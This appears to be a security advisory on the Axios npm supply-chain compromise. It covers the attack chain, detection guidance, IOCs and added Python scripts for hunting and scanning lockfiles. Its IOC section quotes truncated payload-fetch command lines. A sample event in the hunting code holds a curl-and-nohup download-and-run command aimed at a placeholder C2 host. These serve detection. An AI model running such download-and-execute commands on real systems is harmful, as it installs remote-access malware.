Severity: critical

Elastic releases detections for the Axios supply chain compromise

A critical supply chain attack compromised the popular Axios npm package, utilizing a malicious transitive dependency to execute cross-platform payloads during installation. The attack targets Linux, Windows, and macOS systems, deploying OS-specific Remote Access Trojans (RATs) capable of host profiling, command execution, and follow-on payload delivery. Detection engineering efforts should focus on anomalous process ancestry, such as Node.js spawning native OS shells to retrieve and background remote payloads.

Sens: Immediate · Conf: high · Analyzed: 2026-03-31

Authors: Elastic Security Labs

Actors: Axios supply-chain compromise

Source: Elastic Security Labs

IOCs · 4

Key Takeaways

  • Malicious Axios npm packages (versions 1.14.1 and 0.30.4) deliver cross-platform payloads via a transitive dependency named plain-crypto-js.
  • The attack triggers during 'npm install' via a postinstall script, spawning OS-native shells to fetch remote payloads.
  • The payloads deploy OS-specific Remote Access Trojans (RATs): a Python RAT for Linux, a PowerShell RAT for Windows, and a custom Mach-O backdoor for macOS.
  • Detection is most reliable when it monitors process ancestry, specifically Node.js spawning shells or download utilities, followed by detached execution.

Affected Systems

  • Linux
  • Windows
  • macOS
  • Node.js environments

Attack Chain

The attack begins when a developer installs a compromised version of the Axios npm package, which pulls in a malicious transitive dependency (plain-crypto-js). During installation, a postinstall script triggers OS-native execution (using sh, cscript, or osascript) to download a second-stage payload. The payload is then executed in a detached or hidden context, deploying an OS-specific Remote Access Trojan (RAT). These RATs establish persistence, profile the host, and beacon to a C2 server for further tasking, such as arbitrary command execution or in-memory payload injection.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: Yes
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: Elastic Security

Elastic provides behavioral detection rules focusing on process ancestry, such as Node.js spawning curl/wget, renamed binary proxies, and suspicious registry modifications.

Detection Engineering Assessment

  • EDR Visibility: High — The attack relies heavily on anomalous process ancestry (Node.js spawning shells) and OS-native execution, which are highly visible in EDR telemetry.
  • Network Visibility: Medium — Network connections to unknown IPs/domains via curl/wget are visible, but the traffic itself may blend in if User-Agents or specific POST bodies are not inspected.
  • Detection Difficulty: Moderate — While the initial execution is noisy (Node.js spawning curl), the payloads use renamed binaries, in-memory execution, and masquerading to evade static detections.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • Registry Events (Sysmon Event ID 12/13)
  • File Creation (Sysmon Event ID 11)
  • PowerShell Script Block Logging (Event ID 4104)

Hunting Hypotheses

  • Hypothesis: Look for Node.js or related package manager processes spawning OS-native shells or download utilities like curl and wget. | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Medium
  • Hypothesis: Search for shell processes executing with arguments that background the process (e.g., using nohup and &) immediately after a download. | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Low
  • Hypothesis: Identify execution of signed system binaries (like PowerShell) from unexpected directories such as C:\ProgramData. | Telemetry: Process Creation | ATT&CK Stage: Defense Evasion | FP Risk: Low
  • Hypothesis: Monitor for suspicious child processes spawned by macOS XPC services or binaries with invalid code signatures mimicking Apple naming conventions. | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Low
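The four hypotheses above, expressed as checks over process-creation events, as an added example that is not Elastic's rule logic or the report's own code. Field names follow Elastic Common Schema (ECS) flattened into plain dicts; the hypothesis functions, the directory allowlists, and the sample events (including the placeholder URL) are this example's own assumptions and constructed data. It shows why the first hypothesis carries medium false-positive risk: a normal npm lifecycle script also spawns sh, and only the download-then-background pattern separates it from the attack chain.

```python
"""Hunting checks for the four hypotheses in the table above, run over constructed
sample process-creation events. Added example, not Elastic's rule logic. Field
names follow Elastic Common Schema (ECS), flattened into plain dicts."""
from __future__ import annotations

NODE_PARENTS = {"node", "node.exe", "npm", "npm.cmd", "yarn", "pnpm"}
SHELLS = {"sh", "bash", "zsh", "dash", "cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"curl", "wget"}
# Script hosts the attack chain uses for OS-native execution (cscript, osascript)
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "osascript"}
# Signed Windows system binaries that should only run from the expected directories
SIGNED_SYSTEM_BINARIES = {"powershell.exe", "pwsh.exe", "cmd.exe", "cscript.exe",
                          "wscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
EXPECTED_WIN_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
APPLE_SYSTEM_DIRS = ("/system/", "/usr/", "/applications/", "/library/apple/")


def _name(ev, key="process.name"):
    return str(ev.get(key, "")).lower()


def h1_node_spawns_shell(ev):
    """Node.js / package manager parent spawning a shell, script host or downloader.
    Medium FP risk: npm lifecycle scripts legitimately run through sh."""
    return (_name(ev, "process.parent.name") in NODE_PARENTS
            and _name(ev) in SHELLS | SCRIPT_HOSTS | DOWNLOADERS)


def h2_download_then_background(ev):
    """Shell command line that downloads with curl/wget and afterwards backgrounds
    something with nohup or &, in that order."""
    if _name(ev) not in SHELLS:
        return False
    tokens = " ".join(ev.get("process.args", [])).replace(";", " ").split()
    dl = [i for i, t in enumerate(tokens) if t in DOWNLOADERS]
    bg = [i for i, t in enumerate(tokens) if t in ("nohup", "&")]
    return bool(dl) and bool(bg) and min(dl) < max(bg)


def h3_system_binary_unexpected_dir(ev):
    """Signed system binary executing outside its expected directories.
    process.pe.original_file_name comes from the PE version resource, so it
    survives renaming the file (powershell.exe copied to C:\\ProgramData\\wt.exe)."""
    orig = _name(ev, "process.pe.original_file_name")
    exe = _name(ev, "process.executable")
    return orig in SIGNED_SYSTEM_BINARIES and not exe.startswith(EXPECTED_WIN_DIRS)


def h4_macos_apple_lookalike(ev):
    """Binary using Apple naming (com.apple.*) that is unsigned/invalidly signed
    or lives outside Apple-owned paths. The XPC-service parent check from the
    hypothesis is not modelled here."""
    mimics_apple = _name(ev).startswith("com.apple.")
    signed_ok = ev.get("process.code_signature.valid") is True
    outside = not _name(ev, "process.executable").startswith(APPLE_SYSTEM_DIRS)
    return mimics_apple and (not signed_ok or outside)


HYPOTHESES = {"H1": h1_node_spawns_shell, "H2": h2_download_then_background,
              "H3": h3_system_binary_unexpected_dir, "H4": h4_macos_apple_lookalike}


def evaluate(ev):
    """Return the hypothesis ids an event matches, in table order."""
    return [hid for hid, check in HYPOTHESES.items() if check(ev)]


def hunt(events):
    """Map event index -> matched hypotheses, omitting events with no hit."""
    result = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            result[i] = hits
    return result


# Constructed sample events (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    {"process.parent.name": "node", "process.name": "sh", "process.executable": "/bin/sh",
     "process.args": ["sh", "-c", "curl -o /tmp/ld.py http://c2-placeholder.invalid/stage; "
                                  "nohup python3 /tmp/ld.py &"]},
    {"process.parent.name": "cmd.exe", "process.name": "wt.exe",
     "process.executable": "C:\\ProgramData\\wt.exe",
     "process.pe.original_file_name": "PowerShell.EXE",
     "process.args": ["C:\\ProgramData\\wt.exe", "-w", "h", "-c", "<script placeholder>"]},
    {"process.parent.name": "osascript", "process.name": "com.apple.act.mond",
     "process.executable": "/Library/Caches/com.apple.act.mond",
     "process.code_signature.valid": False,
     "process.args": ["/Library/Caches/com.apple.act.mond"]},
    # benign: an npm lifecycle script compiling TypeScript (H1 only, the expected FP)
    {"process.parent.name": "npm", "process.name": "sh", "process.executable": "/bin/sh",
     "process.args": ["sh", "-c", "tsc -p tsconfig.json"]},
    # benign: PowerShell from its normal location
    {"process.parent.name": "explorer.exe", "process.name": "powershell.exe",
     "process.executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "process.pe.original_file_name": "PowerShell.EXE", "process.args": ["powershell.exe"]},
]

if __name__ == "__main__":
    for idx, hits in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["process.name"], hits)
```

In triage, an H1 hit on its own is a lead to enrich (which package, which lifecycle script), while H1 together with H2 on the same event reproduces the Linux stage of this attack chain and warrants immediate containment.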

Control Gaps

  • Static AV signatures (payloads are downloaded dynamically and executed in memory or backgrounded)

Key Behavioral Indicators

  • Node.js spawning curl/wget
  • Renamed powershell.exe (wt.exe) in C:\ProgramData
  • osascript downloading payloads to /Library/Caches
  • Fake IE8 User-Agent string

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Identify and remove any installations of Axios versions 1.14.1 and 0.30.4.
  • Block the identified C2 IP (142.11.206.73) and domain (sfrclak.com) at the perimeter.
  • Search endpoint telemetry for the provided file hashes and anomalous Node.js process ancestry.
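A pre-install check for the first mitigation step, as an added example that is neither Elastic's nor the Axios project's tooling: it walks an npm package-lock.json (lockfileVersion 1 and 2/3) for the versions named on this page and lists packages whose install scripts would run at `npm install`, since a postinstall hook is how this chain triggers. The `MALICIOUS_VERSIONS` table, the helper names, and both sample lockfiles are this example's own constructions; `hasInstallScript` is the field npm records for such packages in lockfileVersion 2/3.

```python
"""Scan an npm package-lock.json for the compromised package versions named on
this page. Added example, not Elastic's or the Axios project's tooling. Handles
lockfileVersion 1 (nested "dependencies") and 2/3 ("packages" keyed by path)."""
import json
import sys

# Versions taken from the advisory above; nothing else is treated as malicious.
MALICIOUS_VERSIONS = {
    "axios": {"1.14.1", "0.30.4"},
    "plain-crypto-js": {"4.2.1"},
}


def iter_lock_packages(lock):
    """Yield (name, version, node_modules path) for every package in the lockfile."""
    packages = lock.get("packages")
    if isinstance(packages, dict):  # lockfileVersion 2 or 3
        for path, meta in packages.items():
            if not path:  # "" is the root project entry, not a dependency
                continue
            # Path ends in node_modules/<name> (or node_modules/@scope/<name>)
            name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
            yield name, meta.get("version", ""), path
        return

    def walk(deps, prefix):  # lockfileVersion 1: recursive "dependencies" tree
        for name, meta in (deps or {}).items():
            path = f"{prefix}node_modules/{name}"
            yield name, meta.get("version", ""), path
            yield from walk(meta.get("dependencies"), path + "/")

    yield from walk(lock.get("dependencies"), "")


def find_compromised(lock):
    """Return [(name, version, path)] for every entry pinned to a listed version."""
    return [(n, v, p) for n, v, p in iter_lock_packages(lock)
            if v in MALICIOUS_VERSIONS.get(n, ())]


def packages_with_install_scripts(lock):
    """Paths of packages whose install/postinstall hook runs at `npm install`,
    the trigger this attack used. Only lockfileVersion 2/3 record hasInstallScript."""
    return sorted(path for path, meta in (lock.get("packages") or {}).items()
                  if path and meta.get("hasInstallScript"))


# Constructed sample lockfiles (not from a real project).
SAMPLE_LOCK_V3 = {
    "name": "sample-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "sample-app", "dependencies": {"axios": "^1.14.0"}},
        "node_modules/axios": {"version": "1.14.1",
                               "dependencies": {"plain-crypto-js": "4.2.1"}},
        "node_modules/plain-crypto-js": {"version": "4.2.1", "hasInstallScript": True},
        "node_modules/some-benign-lib": {"version": "2.0.0"},
    },
}
SAMPLE_LOCK_V1 = {
    "lockfileVersion": 1,
    "dependencies": {
        "axios": {"version": "0.30.4",
                  "dependencies": {"plain-crypto-js": {"version": "4.2.1"}}},
    },
}

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            lock = json.load(fh)
    else:
        lock = SAMPLE_LOCK_V3
    for name, version, path in find_compromised(lock):
        print(f"COMPROMISED {name}@{version} at {path}")
    for path in packages_with_install_scripts(lock):
        print(f"install script: {path}")
```

Run it against a repository's lockfile before installing; a lockfile that resolves axios to a clean version but still pulls plain-crypto-js deserves a look as well. Installing with `npm ci --ignore-scripts` keeps lifecycle hooks from running while the dependency tree is being reviewed.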

Infrastructure Hardening

  • Implement egress filtering to restrict servers from downloading arbitrary executables via curl/wget.
  • Enforce strict execution policies to prevent binaries from running out of C:\ProgramData or /tmp.

User Protection

  • Ensure EDR is deployed and configured to monitor script block logging and process ancestry.
  • Restrict developer environments from installing unverified or newly published npm packages without scanning.

Security Awareness

  • Educate developers on the risks of supply chain attacks and the importance of verifying package dependencies and versions.

MITRE ATT&CK Mapping

  • T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1059.002 - Command and Scripting Interpreter: AppleScript
  • T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1036.003 - Masquerading: Rename System Utilities
  • T1055.012 - Process Injection: Process Hollowing
  • T1105 - Ingress Tool Transfer
  • T1564.001 - Hide Artifacts: Hidden Files and Directories

Additional IOCs

  • IPs:
    • 142[.]11[.]206[.]73 - C2 IP address
  • Domains:
    • sfrclak[.]com - C2 Domain
  • URLs:
    • hxxp://sfrclak[.]com:8000/6202033 - C2 payload hosting URL
  • File Hashes:
    • 6483c004e207137385f480909d6edecf1b699087378aa91745ecba7c3394f9d7 (sha256) - /tmp/ld.py (Linux Python RAT second stage)
    • ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c (sha256) - 6202033.ps1 (Windows PowerShell payload)
    • e49c2732fb9861548208a78e72996b9c3c470b6b562576924bcc3a9fb75bf9ff (sha256) - system.bat (Windows persistence launcher)
  • Registry Keys:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate - Windows persistence key used to execute system.bat
  • File Paths:
    • */node_modules/plain-crypto-js/setup.js - Node.js first-stage dropper
    • /tmp/ld.py - Linux Python RAT second stage
    • C:\ProgramData\wt.exe - Windows renamed powershell.exe used as an execution proxy
    • C:\ProgramData\system.bat - Windows persistence launcher
    • /Library/Caches/com.apple.act.mond - macOS Mach-O backdoor payload
    • /tmp/*.scpt - macOS temporary AppleScript launcher
  • Command Lines:
    • Purpose: Linux payload retrieval and execution | Tools: sh, curl, nohup, python3 | Stage: Execution | sh -c curl -o /tmp/ld.py
    • Purpose: macOS payload retrieval and execution | Tools: osascript, curl, zsh | Stage: Execution | do shell script "curl -o /Library/Caches/com.apple.act.mond
    • Purpose: Windows in-memory payload execution | Tools: powershell, Invoke-WebRequest | Stage: Execution | start /min powershell -w h -c
  • Other:
    • axios 1.14.1 - Malicious npm package
    • axios 0.30.4 - Malicious npm package
    • plain-crypto-js 4.2.1 - Malicious transitive dependency
    • mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) - Malicious User-Agent string used by the RATs
    • packages[.]npm[.]org/product0 - macOS POST body
    • packages[.]npm[.]org/product1 - Windows POST body
    • packages[.]npm[.]org/product2 - Linux POST body